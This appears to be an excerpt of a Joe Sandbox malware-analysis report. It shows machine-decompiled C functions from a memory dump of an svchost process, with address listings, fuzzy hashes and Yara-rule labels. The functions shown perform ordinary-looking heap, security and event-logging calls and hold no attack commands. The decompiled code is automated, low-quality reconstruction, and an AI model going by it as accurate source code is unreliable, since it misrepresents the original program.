				_t122 = E03A69650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                          0x03a2c608
                                          0x03a2c615
                                          0x03a2c625
                                          0x03a2c62d
                                          0x03a2c635
                                          0x03a2c640
                                          0x03a2c680
                                          0x03a2c687
                                          0x03a2c688
                                          0x03a2c689
                                          0x03a2c694
                                          0x03a2c694
                                          0x03a2c642
                                          0x03a2c64a
                                          0x03a2c697
                                          0x03a97a25
                                          0x03a97a2b
                                          0x03a97a2e
                                          0x03a97a30
                                          0x03a97bea
                                          0x03a97bea
                                          0x00000000
                                          0x03a97bea
                                          0x03a97a36
                                          0x03a97a43
                                          0x03a97a48
                                          0x03a97a4c
                                          0x03a97a4e
                                          0x00000000
                                          0x00000000
                                          0x03a97a58
                                          0x03a97a5a
                                          0x03a97a5b
                                          0x03a97a5c
                                          0x03a97a5d
                                          0x03a97a63
                                          0x03a97a64
                                          0x03a97a6a
                                          0x03a97a6c
                                          0x03a97a6e
                                          0x03a979cb
                                          0x03a979cb
                                          0x03a979ce
                                          0x03a979d0
                                          0x03a97a98
                                          0x03a97a9b
                                          0x03a97a9b
                                          0x03a97a9e
                                          0x03a97aa1
                                          0x03a97bbe
                                          0x03a97bbe
                                          0x03a97bc0
                                          0x03a97be0
                                          0x03a97be0
                                          0x03a97a01
                                          0x03a97a01
                                          0x03a97a05
                                          0x03a97a07
                                          0x03a97a15
                                          0x03a97a15
                                          0x03a97a1a
                                          0x00000000
                                          0x03a97a1a
                                          0x03a97bc2
                                          0x03a97bc6
                                          0x03a97bc9
                                          0x03a97bcd
                                          0x03a97bcf
                                          0x03a979e6
                                          0x03a979e6
                                          0x03a979eb
                                          0x03a979eb
                                          0x03a979ef
                                          0x03a979f1
                                          0x00000000
                                          0x00000000
                                          0x03a979f3
                                          0x03a979f5
                                          0x03a979ff
                                          0x03a979ff
                                          0x00000000
                                          0x03a979ff
                                          0x03a979f7
                                          0x03a979fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a979fd
                                          0x03a97bd5
                                          0x03a97bd8
                                          0x00000000
                                          0x00000000
                                          0x03a97ba9
                                          0x03a97bac
                                          0x03a97bb0
                                          0x03a97bb1
                                          0x03a97bb1
                                          0x03a97bb6
                                          0x00000000
                                          0x03a97bb6
                                          0x03a97aa7
                                          0x03a97aaa
                                          0x00000000
                                          0x00000000
                                          0x03a97ab2
                                          0x03a97ab3
                                          0x03a97ab5
                                          0x03a97aec
                                          0x03a97aef
                                          0x03a97b25
                                          0x03a97b28
                                          0x03a97b62
                                          0x03a97b64
                                          0x03a97b8f
                                          0x03a97b92
                                          0x03a97b96
                                          0x03a97b98
                                          0x00000000
                                          0x00000000
                                          0x03a97b9e
                                          0x03a97b9f
                                          0x03a97ba3
                                          0x00000000
                                          0x03a97ba3
                                          0x03a97b66
                                          0x03a97b68
                                          0x03a97ae2
                                          0x03a97ae2
                                          0x00000000
                                          0x03a97ae2
                                          0x03a97b6e
                                          0x03a97b72
                                          0x03a97b75
                                          0x03a97b81
                                          0x03a97b85
                                          0x03a97b87
                                          0x00000000
                                          0x00000000
                                          0x03a97b31
                                          0x03a97b34
                                          0x03a97b3c
                                          0x03a97b45
                                          0x03a97b46
                                          0x03a97b4f
                                          0x03a97b51
                                          0x03a97b57
                                          0x03a97b59
                                          0x03a97b59
                                          0x00000000
                                          0x03a97b59
                                          0x03a97b77
                                          0x00000000
                                          0x03a97b77
                                          0x03a97b2a
                                          0x00000000
                                          0x03a97b2a
                                          0x03a97af1
                                          0x03a97af3
                                          0x00000000
                                          0x00000000
                                          0x03a97afb
                                          0x03a97afc
                                          0x03a97afe
                                          0x00000000
                                          0x00000000
                                          0x03a97b00
                                          0x03a97b03
                                          0x00000000
                                          0x00000000
                                          0x03a97b05
                                          0x03a97b09
                                          0x03a97b0d
                                          0x03a97b0f
                                          0x00000000
                                          0x00000000
                                          0x03a97b18
                                          0x03a97b1d
                                          0x00000000
                                          0x03a97b1d
                                          0x03a97ab7
                                          0x03a97ab9
                                          0x00000000
                                          0x00000000
                                          0x03a97abf
                                          0x03a97ac1
                                          0x00000000
                                          0x00000000
                                          0x03a97ac3
                                          0x03a97ac6
                                          0x00000000
                                          0x00000000
                                          0x03a97ac8
                                          0x03a97acc
                                          0x03a97ad0
                                          0x03a97ad2
                                          0x00000000
                                          0x00000000
                                          0x03a97adb
                                          0x00000000
                                          0x03a97adb
                                          0x03a979d6
                                          0x03a979d9
                                          0x03a979dc
                                          0x03a97a91
                                          0x03a97a94
                                          0x00000000
                                          0x03a97a94
                                          0x03a979e2
                                          0x00000000
                                          0x03a979e2
                                          0x03a97a74
                                          0x03a97a7a
                                          0x00000000
                                          0x00000000
                                          0x03a97a8a
                                          0x03a97a21
                                          0x03a97a21
                                          0x00000000
                                          0x03a97a21
                                          0x03a2c650
                                          0x03a2c651
                                          0x03a2c656
                                          0x03a2c65c
                                          0x03a2c65d
                                          0x03a2c663
                                          0x03a2c664
                                          0x03a2c66a
                                          0x03a2c66e
                                          0x03a979c5
                                          0x03a979c7
                                          0x00000000
                                          0x03a979c7
                                          0x03a2c67a
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afe5334f47cda89cf61bdfa867f150df2861e8e9ead171363b5b9a0cfb350d4c
                                          • Instruction ID: b444704a34b6354cb6f893fdadf1acda0ecc086986c5a271b99c21414ff5dffa
                                          • Opcode Fuzzy Hash: afe5334f47cda89cf61bdfa867f150df2861e8e9ead171363b5b9a0cfb350d4c
                                          • Instruction Fuzzy Hash: 46817D756242019FEF25CF14C880A7AB7E8EF84254F58496FED46AB240D332DD45CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ABB8D0 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E03ABB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3b17b9c; // 0x0
				_t124 = L03A44620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03A69800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E03A695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E03A695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L03A477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03A69910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E03A695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3b17b9c; // 0x0
									_t92 = L03A44620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03A69910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E03A2A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E03ABE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E03ABE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E03A695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                          0x03abb8d9
                                          0x03abb8e4
                                          0x00000000
                                          0x03abb8e6
                                          0x03abb8f3
                                          0x03abb8f5
                                          0x03abb8f5
                                          0x03abb8f8
                                          0x03abb920
                                          0x03abb924
                                          0x03abb936
                                          0x03abb939
                                          0x03abb93d
                                          0x03abb948
                                          0x03abb9a0
                                          0x03abb9a0
                                          0x03abb9a4
                                          0x03abb9bf
                                          0x03abb9c4
                                          0x03abb9c6
                                          0x03abb9cd
                                          0x03abb9d1
                                          0x03abbad4
                                          0x03abbad8
                                          0x03abbada
                                          0x03abbadc
                                          0x03abbadc
                                          0x03abbadf
                                          0x03abbae0
                                          0x03abbae2
                                          0x03abbae4
                                          0x03abbaec
                                          0x03abbaee
                                          0x03abbaf0
                                          0x03abbaf0
                                          0x03abbaec
                                          0x03abbafb
                                          0x03abbafc
                                          0x03abbafe
                                          0x03abbb01
                                          0x03abbb01
                                          0x00000000
                                          0x03abbb06
                                          0x03abb9d7
                                          0x03abb9db
                                          0x03abb9db
                                          0x03abb9de
                                          0x03abb9de
                                          0x03abb9e4
                                          0x03abb9e7
                                          0x03abb9ea
                                          0x03abb9ec
                                          0x03abb9ef
                                          0x03abb9f3
                                          0x03abba1b
                                          0x03abba1b
                                          0x03abba23
                                          0x03abba24
                                          0x03abba27
                                          0x03abba2a
                                          0x03abba2b
                                          0x03abba2e
                                          0x03abba30
                                          0x03abba37
                                          0x03abba3f
                                          0x03abba9c
                                          0x03abbaa2
                                          0x03abbb13
                                          0x03abbb15
                                          0x03abbaae
                                          0x03abbaae
                                          0x03abbab3
                                          0x03abbab5
                                          0x03abbaba
                                          0x03abbac8
                                          0x03abbac8
                                          0x03abbaba
                                          0x03abbacd
                                          0x03abbacf
                                          0x00000000
                                          0x03abbacf
                                          0x03abbb1a
                                          0x00000000
                                          0x03abbb1c
                                          0x03abbaa7
                                          0x03abbb11
                                          0x00000000
                                          0x03abbb11
                                          0x03abbaa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03abba41
                                          0x03abba41
                                          0x03abba41
                                          0x03abba58
                                          0x03abba5d
                                          0x03abba62
                                          0x00000000
                                          0x00000000
                                          0x03abba64
                                          0x03abba67
                                          0x03abba68
                                          0x03abba69
                                          0x03abba6c
                                          0x03abba6f
                                          0x03abba71
                                          0x03abba78
                                          0x03abba80
                                          0x00000000
                                          0x00000000
                                          0x03abba90
                                          0x03abba90
                                          0x03abba97
                                          0x00000000
                                          0x03abba97
                                          0x03abb9f5
                                          0x03abb9f7
                                          0x03abb9f7
                                          0x03abb9fa
                                          0x03abba03
                                          0x03abba07
                                          0x03abba0c
                                          0x03abba10
                                          0x03abba17
                                          0x00000000
                                          0x03abb9f7
                                          0x03abb9a6
                                          0x03abb9a8
                                          0x03abb9af
                                          0x03abb9b3
                                          0x00000000
                                          0x00000000
                                          0x03abb9b9
                                          0x00000000
                                          0x03abb9b9
                                          0x03abb94d
                                          0x03abb98f
                                          0x03abb995
                                          0x03abb999
                                          0x03abb960
                                          0x03abb967
                                          0x03abb968
                                          0x03abb96a
                                          0x00000000
                                          0x03abb96a
                                          0x03abb99b
                                          0x03abb99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03abb99e
                                          0x03abb951
                                          0x03abb954
                                          0x03abb95a
                                          0x03abb95e
                                          0x03abb972
                                          0x03abb979
                                          0x03abb97d
                                          0x03abb97f
                                          0x03abb980
                                          0x03abb982
                                          0x03abb984
                                          0x00000000
                                          0x03abb984
                                          0x00000000
                                          0x03abb926
                                          0x00000000
                                          0x03abb926

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eeb561057bfb06d934d3c100f21510e61fea6e992fed1ba1d18f2b93c932ede9
                                          • Instruction ID: 06e914e9c9d33d40cba9739362b21a255f889b3af801ee7b3c37b31500fa3f19
                                          • Opcode Fuzzy Hash: eeb561057bfb06d934d3c100f21510e61fea6e992fed1ba1d18f2b93c932ede9
                                          • Instruction Fuzzy Hash: FB712036600701EFD731DF24C940FAABBB9EB40720F18492EE6558B2A2DB71E944CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA6DC9 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E03AA6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03AA6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03A47D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03A69AE0();
					_t87 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E03AA795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E03AA795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E03AA795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E03AA795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03A44620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03AA6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03AA6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03AA6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03AA6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03A47D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03A69AE0();
								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03A42400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03A42400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03A42400( &_v52);
							}
							if(_v28 >= 0) {
								return L03A42400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                          0x03aa6dd4
                                          0x03aa6dde
                                          0x03aa6de1
                                          0x03aa6de3
                                          0x03aa6de6
                                          0x03aa6de9
                                          0x03aa6dec
                                          0x03aa6def
                                          0x03aa6df2
                                          0x03aa6df5
                                          0x03aa6dfe
                                          0x03aa6e04
                                          0x03aa6e09
                                          0x03aa6e0d
                                          0x03aa6e18
                                          0x03aa6e1b
                                          0x03aa6e22
                                          0x03aa6e2d
                                          0x03aa6e30
                                          0x03aa6e36
                                          0x03aa6e42
                                          0x03aa6e4d
                                          0x03aa6e50
                                          0x03aa6e55
                                          0x03aa6e5c
                                          0x03aa6e6e
                                          0x03aa6e5e
                                          0x03aa6e67
                                          0x03aa6e67
                                          0x03aa6e73
                                          0x03aa6e74
                                          0x03aa6e77
                                          0x03aa6e7c
                                          0x03aa6e7d
                                          0x03aa6e8e
                                          0x03aa6e93
                                          0x03aa6e9c
                                          0x03aa6ea8
                                          0x03aa6eab
                                          0x03aa6eac
                                          0x03aa6eb3
                                          0x03aa6ecd
                                          0x03aa6edc
                                          0x03aa6ee2
                                          0x03aa6ee5
                                          0x03aa6ef2
                                          0x03aa6efb
                                          0x03aa6f01
                                          0x03aa6f06
                                          0x03aa6f0b
                                          0x03aa6f11
                                          0x03aa6f1a
                                          0x03aa6f22
                                          0x03aa6f26
                                          0x03aa6f26
                                          0x03aa6f33
                                          0x03aa6f41
                                          0x03aa6f44
                                          0x03aa6f47
                                          0x03aa6f54
                                          0x03aa6f65
                                          0x03aa6f77
                                          0x03aa6f7c
                                          0x03aa6f82
                                          0x03aa6f91
                                          0x03aa6f99
                                          0x03aa6fa3
                                          0x03aa6fae
                                          0x03aa6fae
                                          0x03aa6fba
                                          0x03aa6fbb
                                          0x03aa6fbc
                                          0x03aa6fc1
                                          0x03aa6fc2
                                          0x03aa6fd3
                                          0x03aa6fd8
                                          0x03aa6fd8
                                          0x03aa6fdf
                                          0x03aa6fe8
                                          0x03aa6fee
                                          0x03aa6fee
                                          0x03aa6ff5
                                          0x03aa6ffb
                                          0x03aa6ffb
                                          0x03aa7004
                                          0x00000000
                                          0x03aa700a
                                          0x03aa7004
                                          0x03aa6eb3
                                          0x03aa6e9c
                                          0x03aa7015

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 127cebd718ab293bc5adbb2c5450ea8c4bb7d139579dcd2b7a750a3152fff21d
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: A0716076900609AFCB10DFA9CA44AEEFBB9FF48714F14456AE505AB350DB34EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A252A5 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E03A252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E03A3EEF0(0x3b179a0);
					_t104 =  *0x3b18210; // 0x34037b8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E03A3EB70(_t93, 0x3b179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03A69890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E03A3EEF0(0x3b179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E03A3EB70(0, 0x3b179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x34037c5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E03A5F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E03A3EEF0(0x3b179a0);
									__eflags =  *0x3b18210 - _t104; // 0x34037b8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3b18210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03AA4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E03A3EB70(_t95, 0x3b179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E03A695D0();
											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E03A695D0();
											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E03A3EB70(_t93, 0x3b179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E03A695D0();
										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E03A695D0();
										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E03A5F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                          0x03a252a5
                                          0x03a252ad
                                          0x03a252b0
                                          0x03a252b3
                                          0x03a252b7
                                          0x03a252ba
                                          0x03a252bf
                                          0x03a252c4
                                          0x03a252cc
                                          0x00000000
                                          0x00000000
                                          0x03a252ce
                                          0x03a252d9
                                          0x03a252dd
                                          0x03a252e7
                                          0x03a252f7
                                          0x03a252f9
                                          0x03a252fd
                                          0x03a80dcf
                                          0x03a80dd5
                                          0x03a80dd6
                                          0x03a80dd7
                                          0x03a80dd8
                                          0x03a80dd9
                                          0x03a80dde
                                          0x03a80ddf
                                          0x03a80de0
                                          0x03a80de1
                                          0x03a80de2
                                          0x03a80de5
                                          0x03a80dea
                                          0x03a80dec
                                          0x03a80f60
                                          0x03a80f64
                                          0x03a80f70
                                          0x03a80f76
                                          0x03a80f79
                                          0x03a80f79
                                          0x00000000
                                          0x03a80f64
                                          0x03a80df2
                                          0x03a80df7
                                          0x03a80e04
                                          0x03a80e0d
                                          0x03a80e0d
                                          0x03a80e10
                                          0x03a80e1a
                                          0x03a80e1c
                                          0x03a80e4c
                                          0x03a80e52
                                          0x03a80e61
                                          0x03a80e67
                                          0x03a80e6b
                                          0x03a80e70
                                          0x03a80e76
                                          0x03a80ed7
                                          0x03a80edc
                                          0x03a80ee0
                                          0x03a80ee6
                                          0x03a80eea
                                          0x03a80eed
                                          0x03a80ef0
                                          0x03a80ef3
                                          0x03a80ef6
                                          0x03a80ef9
                                          0x03a80efe
                                          0x03a80f01
                                          0x03a80f01
                                          0x03a80f0b
                                          0x03a80f12
                                          0x03a80f16
                                          0x03a80f18
                                          0x03a80f1b
                                          0x03a80f2c
                                          0x03a80f31
                                          0x03a80f31
                                          0x03a80f35
                                          0x03a80f39
                                          0x03a80f3a
                                          0x03a80f3c
                                          0x03a80f3f
                                          0x03a80f50
                                          0x03a80f55
                                          0x03a80f55
                                          0x03a80f59
                                          0x03a252eb
                                          0x03a252f1
                                          0x03a252f1
